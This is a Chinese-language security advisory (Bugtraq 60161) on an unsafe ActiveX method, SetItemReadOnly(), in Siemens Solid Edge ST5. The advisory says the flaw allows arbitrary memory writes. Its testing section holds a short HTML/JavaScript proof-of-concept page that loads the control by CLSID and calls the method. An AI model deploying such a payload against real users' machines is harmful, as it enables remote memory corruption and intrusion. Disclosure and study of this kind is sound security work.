发布日期:2013-05-26
更新日期:2013-05-30
受影响系统:
Siemens Solid Edge ST5 105.x
Siemens SEListCtrlX ActiveX Control 105.x
Siemens WebPartHelper ActiveX Control 105.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60161
SolidEdge是Siemens PLM Software公司旗下的三维CAD软件,采用Siemens PLM Software公司自己拥有专利的Parasolid作为软件核心,将普及型CAD系统与世界上最具领先地位的实体造型引擎结合在一起,是基于Windows平台、功能强大且易用的三维CAD软件。
Siemens Solid Edge SEListCtrlX ActiveX控件内存在不安全的方法 "SetItemReadOnly()" (SEListCTRLX.ocx),可使远程攻击者在任意内存位置写入一些值。
<*来源:rgod (rgod@autistici.org)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false);
obj.SetItemReadOnly(0x61616161,true);
</script>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Siemens
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: